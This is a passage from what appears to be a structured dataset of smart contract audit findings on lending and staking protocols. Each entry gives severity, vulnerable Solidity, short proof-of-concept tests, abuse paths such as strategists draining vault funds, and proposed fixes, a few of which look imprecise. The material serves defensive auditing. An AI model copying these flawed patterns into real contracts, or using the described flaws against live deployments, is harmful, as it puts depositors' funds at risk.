x.mulDivDown(VAULT_FEE(), 1000);\\n strategistUnclaimedShares += convertToShares(fee);\\n }\\n }\\n```\\n -Claiming liquidationAccountant will reduce vault y-intercept by more than the correct amountчhighчWhen `claim()` is called on the Liquidation Accountant, it decreases the y-intercept based on the balance of the contract after funds have been distributed, rather than before. 
The result is that the y-intercept will be decreased more than it should be, siphoning funds from all users.\\nWhen `LiquidationAccountant.sol:claim()` is called, it uses its `withdrawRatio` to send some portion of its earnings to the `WITHDRAW_PROXY` and the rest to the vault.\\nAfter performing these transfers, it updates the vault's y-intercept, decreasing it by the gap between the expected return from the auction, and the reality of how much was sent back to the vault:\\n```\\nPublicVault(VAULT()).decreaseYIntercept(\\n (expected - ERC20(underlying()).balanceOf(address(this))).mulDivDown(\\n 1e18 - withdrawRatio,\\n 1e18\\n )\\n);\\n```\\n\\nThis rebalancing uses the balance of the `liquidationAccountant` to perform its calculation, but it is done after the balance has already been distributed, so it will always be 0.\\nLooking at an example:\\n`expected = 1 ether` (meaning the y-intercept is currently based on this value)\\n`withdrawRatio = 0` (meaning all funds will go back to the vault)\\nThe auction sells for exactly 1 ether\\n1 ether is therefore sent directly to the vault\\nIn this case, the y-intercept should not be updated, as the outcome was equal to the `expected` outcome\\nHowever, because the calculation above happens after the funds are distributed, the decrease equals `(expected - 0) * 1e18 / 1e18`, which equals `expected`\\nThat decrease should not happen, and causing problems for the protocol's accounting. For example, when `withdraw()` is called, it uses the y-intercept in its calculation of the `totalAssets()` held by the vault, creating artificially low asset values for a given number of shares.чThe amount of assets sent to the vault has already been calculated, as we've already sent it. 
Therefore, rather than the full existing formula, we can simply call:\\n```\\nPublicVault(VAULT()).decreaseYIntercept(expected - balance)\\n```\\n\\nAlternatively, we can move the current code above the block of code that transfers funds out (L73).чEvery time the liquidation accountant is used, the vault's math will be thrown off and user shares will be falsely diluted.ч```\\nPublicVault(VAULT()).decreaseYIntercept(\\n (expected - ERC20(underlying()).balanceOf(address(this))).mulDivDown(\\n 1e18 - withdrawRatio,\\n 1e18\\n )\\n);\\n```\\n -liquidationAccountant can be claimed at any timeчhighчNew liquidations are sent to the `liquidationAccountant` with a `finalAuctionTimestamp` value, but the actual value that is passed in is simply the duration of an auction. The `claim()` function uses this value in a require check, so this error will allow it to be called before the auction is complete.\\nWhen a lien is liquidated, `AstariaRouter.sol:liquidate()` is called. If the lien is set to end in a future epoch, we call `handleNewLiquidation()` on the `liquidationAccountant`.\\nOne of the values passed in this call is the `finalAuctionTimestamp`, which updates the `finalAuctionEnd` variable in the `liquidationAccountant`. 
This value is then used to protect the `claim()` function from being called too early.\\nHowever, when the router calls `handleLiquidationAccountant()`, it passes the duration of an auction rather than the final timestamp:\\n```\\nLiquidationAccountant(accountant).handleNewLiquidation(\\n lien.amount,\\n COLLATERAL_TOKEN.auctionWindow() + 1 days\\n);\\n```\\n\\nAs a result, `finalAuctionEnd` will be set to 259200 (3 days).\\nWhen `claim()` is called, it requires the final auction to have ended for the function to be called:\\n```\\nrequire(\\n block.timestamp > finalAuctionEnd || finalAuctionEnd == uint256(0),\\n \"final auction has not ended\"\\n);\\n```\\n\\nBecause of the error above, `block.timestamp` will always be greater than `finalAuctionEnd`, so this will always be permitted.чAdjust the call from the router to use the ending timestamp as the argument, rather than the duration:\\n```\\nLiquidationAccountant(accountant).handleNewLiquidation(\\n lien.amount,\\n block.timestamp + COLLATERAL_TOKEN.auctionWindow() + 1 days\\n);\\n```\\nчAnyone can call `claim()` before an auction has ended. 
This can cause many problems, but the clearest is that it can ruin the protocol's accounting by decreasing the Y intercept of the vault.\\nFor example, if `claim()` is called before the auction, the returned value will be 0, so the Y intercept will be decreased as if there was an auction that returned no funds.ч```\\nLiquidationAccountant(accountant).handleNewLiquidation(\\n lien.amount,\\n COLLATERAL_TOKEN.auctionWindow() + 1 days\\n);\\n```\\n -Incorrect fees will be chargedчhighчIf user has provided transferAmount which is greater than all lien.amount combined then initiatorPayment will be incorrect since it is charged on full amount when only partial was used as shown in poc\\nObserve the _handleIncomingPayment function\\nLet's say transferAmount was 1000\\ninitiatorPayment is calculated on this full transferAmount\\n```\\nuint256 initiatorPayment = transferAmount.mulDivDown(\\n auction.initiatorFee,\\n 100\\n ); \\n```\\n\\nNow all liens are iterated and lien.amount is kept on deducting from transferAmount until all liens are navigated\\n```\\nif (transferAmount >= lien.amount) {\\n payment = lien.amount;\\n transferAmount -= payment;\\n } else {\\n payment = transferAmount;\\n transferAmount = 0;\\n }\\n\\n if (payment > 0) {\\n LIEN_TOKEN.makePayment(tokenId, payment, lien.position, payer);\\n }\\n }\\n```\\n\\nLet's say after the loop completes the transferAmount is still left as 100\\nThis means only 900 transferAmount was used but fees were deducted on the full amount of 1000чCalculate the exact amount of transfer amount required for the transaction and calculate the initiator fee based on this amountчExcess initiator fees will be deducted which were not requiredч```\\nuint256 initiatorPayment = transferAmount.mulDivDown(\\n auction.initiatorFee,\\n 100\\n ); \\n```\\n -isValidRefinance checks both conditions instead of one, leading to rejection of valid refinancesчhighч`isValidRefinance()` is intended to check whether either (a) the loan interest rate decreased 
sufficiently or (b) the loan duration increased sufficiently. Instead, it requires both of these to be true, leading to the rejection of valid refinances.\\nWhen trying to buy out a lien from `LienToken.sol:buyoutLien()`, the function calls `AstariaRouter.sol:isValidRefinance()` to check whether the refi terms are valid.\\n```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n\\nOne of the roles of this function is to check whether the rate decreased by more than 0.5%. From the docs:\\nAn improvement in terms is considered if either of these conditions is met:\\nThe loan interest rate decrease by more than 0.5%.\\nThe loan duration increases by more than 14 days.\\nThe currently implementation of the code requires both of these conditions to be met:\\n```\\nreturn (\\n newLien.rate >= minNewRate &&\\n ((block.timestamp + newLien.duration - lien.start - lien.duration) >= minDurationIncrease)\\n);\\n```\\nчChange the AND in the return statement to an OR:\\n```\\nreturn (\\n newLien.rate >= minNewRate ||\\n ((block.timestamp + newLien.duration - lien.start - lien.duration) >= minDurationIncrease)\\n);\\n```\\nчValid refinances that meet one of the two criteria will be rejected.ч```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n -isValidRefinance will approve invalid refinances and reject valid refinances due to buggy mathчhighчThe math in `isValidRefinance()` checks whether the rate increased rather than decreased, resulting in invalid refinances being approved and valid refinances being rejected.\\nWhen trying to buy out a lien from `LienToken.sol:buyoutLien()`, the function calls `AstariaRouter.sol:isValidRefinance()` to check whether the refi terms are valid.\\n```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n\\nOne of the roles of this function is to check whether the rate decreased by more 
than 0.5%. From the docs:\\nAn improvement in terms is considered if either of these conditions is met:\\nThe loan interest rate decrease by more than 0.5%.\\nThe loan duration increases by more than 14 days.\\nThe current implementation of the function does the opposite. It calculates a `minNewRate` (which should be maxNewRate) and then checks whether the new rate is greater than that value.\\n```\\nuint256 minNewRate = uint256(lien.rate) - minInterestBPS;\\nreturn (newLien.rate >= minNewRate // rest of code\\n```\\n\\nThe result is that if the new rate has increased (or decreased by less than 0.5%), it will be considered valid, but if it has decreased by more than 0.5% (the ideal behavior) it will be rejected as invalid.чFlip the logic used to check the rate to the following:\\n```\\nuint256 maxNewRate = uint256(lien.rate) - minInterestBPS;\\nreturn (newLien.rate <= maxNewRate// rest of code\\n```\\nчUsers can perform invalid refinances with the wrong parameters.\\nUsers who should be able to perform refinances at better rates will not be able to.ч```\\nif (!ASTARIA_ROUTER.isValidRefinance(lienData[lienId], ld)) {\\n revert InvalidRefinance();\\n}\\n```\\n -new loans \"max duration\" is not restrictedчmediumчdocument : \" Epochs PublicVaults operate around a time-based epoch system. An epoch length is defined by the strategist that deploys the PublicVault. The duration of new loans is restricted to not exceed the end of the next epoch. For example, if a PublicVault is 15 days into a 30-day epoch, new loans must not be longer than 45 days. \" but more than 2 epoch's duration can be added\\nthe max duration is not detected. 
add success when > next epoch\\n#AstariaTest#testBasicPublicVaultLoan\\n```\\n function testBasicPublicVaultLoan() public {\\n\\n IAstariaRouter.LienDetails memory standardLien2 =\\n IAstariaRouter.LienDetails({\\n maxAmount: 50 ether,\\n rate: (uint256(1e16) * 150) / (365 days),\\n duration: 50 days, /****** more then 14 * 2 *******/\\n maxPotentialDebt: 50 ether\\n }); \\n\\n _commitToLien({\\n vault: publicVault,\\n strategist: strategistOne,\\n strategistPK: strategistOnePK,\\n tokenContract: tokenContract,\\n tokenId: tokenId,\\n lienDetails: standardLien2, /**** use standardLien2 ****/\\n amount: 10 ether,\\n isFirstLien: true\\n });\\n }\\n```\\nчPublicVault#_afterCommitToLien\\n```\\n function _afterCommitToLien(uint256 lienId, uint256 amount)\\n internal\\n virtual\\n override\\n {\\n // increment slope for the new lien\\n unchecked {\\n slope += LIEN_TOKEN().calculateSlope(lienId);\\n }\\n\\n ILienToken.Lien memory lien = LIEN_TOKEN().getLien(lienId);\\n\\n uint256 epoch = Math.ceilDiv(\\n lien.start + lien.duration - START(),\\n EPOCH_LENGTH()\\n ) - 1;\\n\\n+ require(epoch <= currentEpoch + 1,\"epoch max <= currentEpoch + 1\");\\n\\n liensOpenForEpoch[epoch]++;\\n emit LienOpen(lienId, epoch);\\n }\\n```\\nчToo long durationч```\\n function testBasicPublicVaultLoan() public {\\n\\n IAstariaRouter.LienDetails memory standardLien2 =\\n IAstariaRouter.LienDetails({\\n maxAmount: 50 ether,\\n rate: (uint256(1e16) * 150) / (365 days),\\n duration: 50 days, /****** more then 14 * 2 *******/\\n maxPotentialDebt: 50 ether\\n }); \\n\\n _commitToLien({\\n vault: publicVault,\\n strategist: strategistOne,\\n strategistPK: strategistOnePK,\\n tokenContract: tokenContract,\\n tokenId: tokenId,\\n lienDetails: standardLien2, /**** use standardLien2 ****/\\n amount: 10 ether,\\n isFirstLien: true\\n });\\n }\\n```\\n -_makePayment is logically inconsistent with how lien stack is managed causing payments to multiple liens to failчmediumч`_makePayment(uint256, 
uint256)` looping logic is inconsistent with how `_deleteLienPosition` manages the lien stack. `_makePayment` loops from 0 to `openLiens.length` but `_deleteLienPosition` (called when a lien is fully paid off) actively compresses the lien stack. When a payment pays off multiple liens the compressing effect causes an array OOB error towards the end of the loop.\\n```\\nfunction _makePayment(uint256 collateralId, uint256 totalCapitalAvailable)\\n internal\\n{\\n uint256[] memory openLiens = liens[collateralId];\\n uint256 paymentAmount = totalCapitalAvailable;\\n for (uint256 i = 0; i < openLiens.length; ++i) {\\n uint256 capitalSpent = _payment(\\n collateralId,\\n uint8(i),\\n paymentAmount,\\n address(msg.sender)\\n );\\n paymentAmount -= capitalSpent;\\n }\\n}\\n```\\n\\n`LienToken.sol#_makePayment(uint256, uint256)` loops from 0 to `openLiens.Length`. This loop attempts to make a payment to each lien calling `_payment` with the current index of the loop.\\n```\\nfunction _deleteLienPosition(uint256 collateralId, uint256 position) public {\\n uint256[] storage stack = liens[collateralId];\\n require(position < stack.length, \"index out of bounds\");\\n\\n emit RemoveLien(\\n stack[position],\\n lienData[stack[position]].collateralId,\\n lienData[stack[position]].position\\n );\\n for (uint256 i = position; i < stack.length - 1; i++) {\\n stack[i] = stack[i + 1];\\n }\\n stack.pop();\\n}\\n```\\n\\n`LienToken.sol#_deleteLienPosition` is called on liens when they are fully paid off. The most interesting portion of the function is how the lien is removed from the stack. We can see that all liens above the lien in question are slid down the stack and the top is popped. This has the effect of reducing the total length of the array. This is where the logical inconsistency is. If the first lien is paid off, it will be removed and the formerly second lien will now occupy it's index. 
So then when `_payment` is called in the next loop with the next index it won't reference the second lien since the second lien is now in the first lien index.\\nAssuming there are 2 liens on some collateral. `liens[0].amount = 100` and `liens[1].amount = 50`. A user wants to pay off their entire lien balance so they call `_makePayment(uint256, uint256)` with an amount of 150. On the first loop it calls `_payment` with an index of 0. This pays off `liens[0]`. `_deleteLienPosition` is called with index of 0 removing `liens[0]`. Because of the sliding logic in `_deleteLienPosition` `lien[1]` has now slid into the `lien[0]` position. On the second loop it calls `_payment` with an index of 1. When it tries to grab the data for the lien at that index it will revert due to OOB error because the array no longer contains an index of 1.чPayment logic inside of `AuctionHouse.sol` works. `_makePayment` should be changed to mimic that logic.чLarge payments are impossible and user must manually pay off each lien separatelyч```\\nfunction _makePayment(uint256 collateralId, uint256 totalCapitalAvailable)\\n internal\\n{\\n uint256[] memory openLiens = liens[collateralId];\\n uint256 paymentAmount = totalCapitalAvailable;\\n for (uint256 i = 0; i < openLiens.length; ++i) {\\n uint256 capitalSpent = _payment(\\n collateralId,\\n uint8(i),\\n paymentAmount,\\n address(msg.sender)\\n );\\n paymentAmount -= capitalSpent;\\n }\\n}\\n```\\n -LienToken._payment function increases users debtчmediumчLienToken._payment function increases users debt by setting `lien.amount = _getOwed(lien)`\\n`LienToken._payment` is used by `LienToken.makePayment` function that allows borrower to repay part or all his debt.\\nAlso this function can be called by `AuctionHouse` when the lien is liquidated.\\n```\\n function _payment(\\n uint256 collateralId,\\n uint8 position,\\n uint256 paymentAmount,\\n address payer\\n ) internal returns (uint256) {\\n if (paymentAmount == uint256(0)) {\\n return 
uint256(0);\\n }\\n\\n\\n uint256 lienId = liens[collateralId][position];\\n Lien storage lien = lienData[lienId];\\n uint256 end = (lien.start + lien.duration);\\n require(\\n block.timestamp < end || address(msg.sender) == address(AUCTION_HOUSE),\\n \"cannot pay off an expired lien\"\\n );\\n\\n\\n address lienOwner = ownerOf(lienId);\\n bool isPublicVault = IPublicVault(lienOwner).supportsInterface(\\n type(IPublicVault).interfaceId\\n );\\n\\n\\n lien.amount = _getOwed(lien);\\n\\n\\n address payee = getPayee(lienId);\\n if (isPublicVault) {\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n }\\n if (lien.amount > paymentAmount) {\\n lien.amount -= paymentAmount;\\n lien.last = block.timestamp.safeCastTo32();\\n // slope does not need to be updated if paying off the rest, since we neutralize slope in beforePayment()\\n if (isPublicVault) {\\n IPublicVault(lienOwner).afterPayment(lienId);\\n }\\n } else {\\n if (isPublicVault && !AUCTION_HOUSE.auctionExists(collateralId)) {\\n // since the openLiens count is only positive when there are liens that haven't been paid off\\n // that should be liquidated, this lien should not be counted anymore\\n IPublicVault(lienOwner).decreaseEpochLienCount(\\n IPublicVault(lienOwner).getLienEpoch(end)\\n );\\n }\\n //delete liens\\n _deleteLienPosition(collateralId, position);\\n delete lienData[lienId]; //full delete\\n\\n\\n _burn(lienId);\\n }\\n\\n\\n TRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n\\n\\n emit Payment(lienId, paymentAmount);\\n return paymentAmount;\\n }\\n```\\n\\nHere lien.amount becomes lien.amount + accrued interests, because `_getOwed` do that calculation.\\n`lien.amount` is the amount that user borrowed. So actually that line has just increased user's debt. And in case if he didn't pay all amount of lien, then next time he will pay more interests.\\nExample. User borrows 1 eth. His `lien.amount` is 1eth. Then he wants to repay some part(let's say 0.5 eth). 
Now his `lien.amount` becomes `lien.amount + interests`. When he pays next time, he pays `(lien.amount + interests) + new interests`. So interests are acummulated on previous interests.чIssue LienToken._payment function increases users debt\\nDo not update lien.amount to _getOwed(lien).чUser borrowed amount increases and leads to lose of funds.ч```\\n function _payment(\\n uint256 collateralId,\\n uint8 position,\\n uint256 paymentAmount,\\n address payer\\n ) internal returns (uint256) {\\n if (paymentAmount == uint256(0)) {\\n return uint256(0);\\n }\\n\\n\\n uint256 lienId = liens[collateralId][position];\\n Lien storage lien = lienData[lienId];\\n uint256 end = (lien.start + lien.duration);\\n require(\\n block.timestamp < end || address(msg.sender) == address(AUCTION_HOUSE),\\n \"cannot pay off an expired lien\"\\n );\\n\\n\\n address lienOwner = ownerOf(lienId);\\n bool isPublicVault = IPublicVault(lienOwner).supportsInterface(\\n type(IPublicVault).interfaceId\\n );\\n\\n\\n lien.amount = _getOwed(lien);\\n\\n\\n address payee = getPayee(lienId);\\n if (isPublicVault) {\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n }\\n if (lien.amount > paymentAmount) {\\n lien.amount -= paymentAmount;\\n lien.last = block.timestamp.safeCastTo32();\\n // slope does not need to be updated if paying off the rest, since we neutralize slope in beforePayment()\\n if (isPublicVault) {\\n IPublicVault(lienOwner).afterPayment(lienId);\\n }\\n } else {\\n if (isPublicVault && !AUCTION_HOUSE.auctionExists(collateralId)) {\\n // since the openLiens count is only positive when there are liens that haven't been paid off\\n // that should be liquidated, this lien should not be counted anymore\\n IPublicVault(lienOwner).decreaseEpochLienCount(\\n IPublicVault(lienOwner).getLienEpoch(end)\\n );\\n }\\n //delete liens\\n _deleteLienPosition(collateralId, position);\\n delete lienData[lienId]; //full delete\\n\\n\\n _burn(lienId);\\n }\\n\\n\\n 
TRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n\\n\\n emit Payment(lienId, paymentAmount);\\n return paymentAmount;\\n }\\n```\\n -_validateCommitment fails for approved operatorsчmediumчIf a collateral token owner approves another user as an operator for all their tokens (rather than just for a given token), the validation check in `_validateCommitment()` will fail.\\nThe collateral token is implemented as an ERC721, which has two ways to approve another user:\\nApprove them to take actions with a given token (approve())\\nApprove them as an \"operator\" for all your owned tokens (setApprovalForAll())\\nHowever, when the `_validateCommitment()` function checks that the token is owned or approved by `msg.sender`, it does not accept those who are set as operators.\\n```\\nif (msg.sender != holder) {\\n require(msg.sender == operator, \"invalid request\");\\n}\\n```\\nчInclude an additional check to confirm whether the `msg.sender` is approved as an operator on the token:\\n```\\n address holder = ERC721(COLLATERAL_TOKEN()).ownerOf(collateralId);\\n address approved = ERC721(COLLATERAL_TOKEN()).getApproved(collateralId);\\n address operator = ERC721(COLLATERAL_TOKEN()).isApprovedForAll(holder);\\n\\n if (msg.sender != holder) {\\n require(msg.sender == operator || msg.sender == approved, \"invalid request\");\\n }\\n```\\nчApproved operators of collateral tokens will be rejected from taking actions with those tokens.ч```\\nif (msg.sender != holder) {\\n require(msg.sender == operator, \"invalid request\");\\n}\\n```\\n -timeToEpochEnd calculates backwards, breaking protocol mathчmediumчWhen a lien is liquidated, it calls `timeToEpochEnd()` to determine if a liquidation accountant should be deployed and we should adjust the protocol math to expect payment in a future epoch. 
Because of an error in the implementation, all liquidations that will pay out in the current epoch are set up as future epoch liquidations.\\nThe `liquidate()` function performs the following check to determine if it should set up the liquidation to be paid out in a future epoch:\\n```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n\\nThis check expects that `timeToEpochEnd()` will return the time until the epoch is over. However, the implementation gets this backwards:\\n```\\nfunction timeToEpochEnd() public view returns (uint256) {\\n uint256 epochEnd = START() + ((currentEpoch + 1) * EPOCH_LENGTH());\\n\\n if (epochEnd >= block.timestamp) {\\n return uint256(0);\\n }\\n\\n return block.timestamp - epochEnd;\\n}\\n```\\n\\nIf `epochEnd >= block.timestamp`, that means that there IS remaining time in the epoch, and it should perform the calculation to return `epochEnd - block.timestamp`. In the opposite case, where `epochEnd <= block.timestamp`, it should return zero.\\nThe result is that the function returns 0 for any epoch that isn't over. Since `0 < COLLATERAL_TOKEN.auctionWindow())`, all liquidated liens will trigger a liquidation accountant and the rest of the accounting for future epoch withdrawals.чFix the `timeToEpochEnd()` function so it calculates the remaining time properly:\\n```\\nfunction timeToEpochEnd() public view returns (uint256) {\\n uint256 epochEnd = START() + ((currentEpoch + 1) * EPOCH_LENGTH());\\n\\n if (epochEnd <= block.timestamp) {\\n return uint256(0);\\n }\\n\\n return epochEnd - block.timestamp; //\\n}\\n```\\nчAccounting for a future epoch withdrawal causes a number of inconsistencies in the protocol's math, the impact of which vary depending on the situation. As a few examples:\\nIt calls `decreaseEpochLienCount()`. 
This has the effect of artificially lowering the number of liens in the epoch, which will cause the final liens paid off in the epoch to revert (and will let us process the epoch earlier than intended).\\nIt sets the payee of the lien to the liquidation accountant, which will pay out according to the withdrawal ratio (whereas all funds should be staying in the vault).\\nIt calls `increaseLiquidationsExpectedAtBoundary()`, which can throw off the math when processing the epoch.ч```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n -_payment() function transfers full paymentAmount, overpaying first liensчmediumчThe `_payment()` function sends the full `paymentAmount` argument to the lien owner, which both (a) overpays lien owners if borrowers accidentally overpay and (b) sends the first lien owner all the funds for the entire loop of a borrower is intending to pay back multiple loans.\\nThere are two `makePayment()` functions in LienToken.sol. One that allows the user to specific a `position` (which specific lien they want to pay back, and another that iterates through their liens, paying each back.\\nIn both cases, the functions call out to `_payment()` with a `paymentAmount`, which is sent (in full) to the lien owner.\\n```\\nTRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n```\\n\\nThis behavior can cause problems in both cases.\\nThe first case is less severe: If the user is intending to pay off one lien, and they enter a `paymentAmount` greater than the amount owed, the function will send the full `paymentAmount` to the lien owner, rather than just sending the amount owed.\\nThe second case is much more severe: If the user is intending to pay towards all their loans, the `_makePayment()` function loops through open liens and performs the following:\\n```\\nuint256 paymentAmount = totalCapitalAvailable;\\nfor (uint256 i = 0; i < openLiens.length; ++i) {\\n uint256 capitalSpent = _payment(\\n 
collateralId,\\n uint8(i),\\n paymentAmount,\\n address(msg.sender)\\n );\\n paymentAmount -= capitalSpent;\\n}\\n```\\n\\nThe `_payment()` function is called with the first lien with `paymentAmount` set to the full amount sent to the function. The result is that this full amount is sent to the first lien holder, which could greatly exceed the amount they are owed.чIssue _payment() function transfers full paymentAmount, overpaying first liens\\nIn `_payment()`, if `lien.amount < paymentAmount`, set `paymentAmount = lien.amount`.\\nThe result will be that, in this case, only `lien.amount` is transferred to the lien owner, and this value is also returned from the function to accurately represent the amount that was paid.чA user who is intending to pay off all their loans will end up paying all the funds they offered, but only paying off their first lien, potentially losing a large amount of funds.ч```\\nTRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n```\\n -_getInterest() function uses block.timestamp instead of the inputted timestampчmediumчThe `_getInterest()` function takes a timestamp as input. However, in a crucial check in the function, it uses `block.timestamp` instead. The result is that other functions expecting accurate interest amounts will receive incorrect values.\\nThe `_getInterest()` function takes a lien and a timestamp as input. 
The intention is for it to calculate the amount of time that has passed in the lien (delta_t) and multiply this value by the rate and the amount to get the interest generated by this timestamp.\\nHowever, the function uses the following check regarding the timestamp:\\n```\\nif (block.timestamp >= lien.start + lien.duration) {\\n delta_t = uint256(lien.start + lien.duration - lien.last);\\n} \\n```\\n\\nBecause this check uses `block.timestamp` before returning the maximum interest payment, the function will incorrectly determine which path to take, and return an incorrect interest value.чChange `block.timestamp` to `timestamp` so that the if statement checks correctly.чThere are two negative consequences that can come from this miscalculation:\\nif the function is called when the lien is over (block.timestamp >= lien.start + lien.duration) to check an interest amount from a timestamp during the lien, it will incorrectly return the maximum interest value\\nIf the function is called when the lien is active for a timestamp long after the lien is over, it will skip the check to return maximum value and return the value that would have been generated if interest kept accruing indefinitely (using delta_t = uint256(timestamp.safeCastTo32() - lien.last);)\\nThis `_getInterest()` function is used in many crucial protocol functions (_getOwed(), `calculateSlope()`, `changeInSlope()`, getTotalDebtForCollateralToken()), so these incorrect values can have surprising and unexpected negative impacts on the protocol.ч```\\nif (block.timestamp >= lien.start + lien.duration) {\\n delta_t = uint256(lien.start + lien.duration - lien.last);\\n} \\n```\\n -Vault Fee uses incorrect offset leading to wildly incorrect value, allowing strategists to steal all fundsчmediumч`VAULT_FEE()` uses an incorrect offset, returning a number ~1e16X greater than intended, providing strategists with unlimited access to drain all vault funds.\\nWhen using ClonesWithImmutableArgs, offset values are set so 
that functions representing variables can retrieve the correct values from storage.\\nIn the ERC4626-Cloned.sol implementation, `VAULT_TYPE()` is given an offset of 172. However, the value before it is a `uint8` at the offset 164. Since a `uint8` takes only 1 byte of space, `VAULT_TYPE()` should have an offset of 165.\\nI put together a POC to grab the value of `VAULT_FEE()` in the test setup:\\n```\\nfunction testVaultFeeIncorrectlySet() public {\\n Dummy721 nft = new Dummy721();\\n address tokenContract = address(nft);\\n uint256 tokenId = uint256(1);\\n address publicVault = _createPublicVault({\\n strategist: strategistOne,\\n delegate: strategistTwo,\\n epochLength: 14 days\\n });\\n uint fee = PublicVault(publicVault).VAULT_FEE();\\n console.log(fee)\\n assert(fee == 5000); // 5000 is the value that was meant to be set\\n}\\n```\\n\\nIn this case, the value returned is > 3e20.чSet the offset for `VAULT_FEE()` to 165. I tested this value in the POC I created and it correctly returned the value of 5000.чThis is a highly critical bug. `VAULT_FEE()` is used in `_handleStrategistInterestReward()` to determine the amount of tokens that should be allocated to `strategistUnclaimedShares`.\\n```\\nif (VAULT_FEE() != uint256(0)) {\\n uint256 interestOwing = LIEN_TOKEN().getInterest(lienId);\\n uint256 x = (amount > interestOwing) ? 
interestOwing : amount;\\n uint256 fee = x.mulDivDown(VAULT_FEE(), 1000); //VAULT_FEE is a basis point\\n strategistUnclaimedShares += convertToShares(fee);\\n }\\n```\\n\\nThe result is that strategistUnclaimedShares will be billions of times higher than the total interest generated, essentially giving strategist access to withdraw all funds from their vaults at any time.ч```\\nfunction testVaultFeeIncorrectlySet() public {\\n Dummy721 nft = new Dummy721();\\n address tokenContract = address(nft);\\n uint256 tokenId = uint256(1);\\n address publicVault = _createPublicVault({\\n strategist: strategistOne,\\n delegate: strategistTwo,\\n epochLength: 14 days\\n });\\n uint fee = PublicVault(publicVault).VAULT_FEE();\\n console.log(fee)\\n assert(fee == 5000); // 5000 is the value that was meant to be set\\n}\\n```\\n -Bids cannot be created within timeBuffer of completion of a max duration auctionчmediumчThe auction mechanism is intended to watch for bids within `timeBuffer` of the end of the auction, and automatically increase the remaining duration to `timeBuffer` if such a bid comes in.\\nThere is an error in the implementation that causes all bids within `timeBuffer` of the end of a max duration auction to revert, effectively ending the auction early and cutting off bidders who intended to wait until the end.\\nIn the `createBid()` function in AuctionHouse.sol, the function checks if a bid is within the final `timeBuffer` of the auction:\\n```\\nif (firstBidTime + duration - block.timestamp < timeBuffer)\\n```\\n\\nIf so, it sets `newDuration` to equal the amount that will extend the auction to `timeBuffer` from now:\\n```\\nuint64 newDuration = uint256( duration + (block.timestamp + timeBuffer - firstBidTime) ).safeCastTo64();\\n```\\n\\nIf this `newDuration` doesn't extend beyond the `maxDuration`, this works great. 
However, if it does extend beyond `maxDuration`, the following code is used to update duration:\\n```\\nauctions[tokenId].duration = auctions[tokenId].maxDuration - firstBidTime;\\n```\\n\\nThis code is incorrect. `maxDuration` will be a duration for the contest (currently set to 3 days), whereas `firstBidTime` is a timestamp for the start of the auction (current timestamps are > 1 billion).\\nSubtracting `firstBidTime` from `maxDuration` will underflow, which will revert the function.чChange this assignment to simply assign `duration` to `maxDuration`, as follows:\\n```\\nauctions[tokenId].duration = auctions[tokenId].maxDuration\\n```\\nчBidders who expected to wait until the end of the auction to bid will be cut off from bidding, as the auction will revert their bids.\\nVaults whose collateral is up for auction will earn less than they otherwise would have.ч```\\nif (firstBidTime + duration - block.timestamp < timeBuffer)\\n```\\n -Loan can be written off by anybody before overdue delay expiresчhighчWhen a borrower takes a second loan after a loan that has been written off, this second loan can be written off instantly by any other member due to missing update of last repay block, leaving the staker at a loss.\\nA staker stakes and vouches a borrower\\nthe borrower borrows calling UToken:borrow: `accountBorrows[borrower].lastRepay` is updated with the current block number\\nthe staker writes off the entire debt of the borrower calling `UserManager:debtWriteOff`. In the internal call to `UToken:debtWriteOff` the principal is set to zero but `accountBorrows[borrower].lastRepay` is not updated\\n90 days pass and a staker vouches for the same borrower\\nthe borrower borrows calling UToken:borrow: `accountBorrows[borrower].lastRepay` is not set to the current block since non zero and stays to the previous value.\\n`accountBorrows[borrower].lastRepay` is now old enough to allow the check in `UserManager:debtWriteOff` at line 738 to pass. 
The debt is written off by any other member immediately after the loan is given. The staker loses the staked amount immediately.\\n```\\n if (block.number <= lastRepay + overdueBlocks + maxOverdueBlocks) {\\n if (staker != msg.sender) revert AuthFailed();\\n }\\n```\\n\\nThe last repay block is still stale and a new loan can be taken and written off immediately many times as long as stakers are trusting the borrower\\nNote that this can be exploited maliciously by the borrower, who can continuously ask for loans and then write them off immediately.чIssue Loan can be written off by anybody before overdue delay expires\\nReset `lastRepay` for the borrower to 0 when the debt is written off completely\\n```\\n function debtWriteOff(address borrower, uint256 amount) external override whenNotPaused onlyUserManager {\\n uint256 oldPrincipal = getBorrowed(borrower);\\n uint256 repayAmount = amount > oldPrincipal ? oldPrincipal : amount;\\n\\n// Add the line below\\n if (oldPrincipal == repayAmount) accountBorrows[borrower].lastRepay = 0;\\n accountBorrows[borrower].principal = oldPrincipal - repayAmount;\\n totalBorrows -= repayAmount;\\n }\\n```\\nчThe staker of the loan loses the staked amount well before the overdue delay has expiredч```\\n if (block.number <= lastRepay + overdueBlocks + maxOverdueBlocks) {\\n if (staker != msg.sender) revert AuthFailed();\\n }\\n```\\n -A stake that has just been locked gets full reward multiplierчmediumчA staker gets rewarded with full multiplier even if its stake has just been locked. 
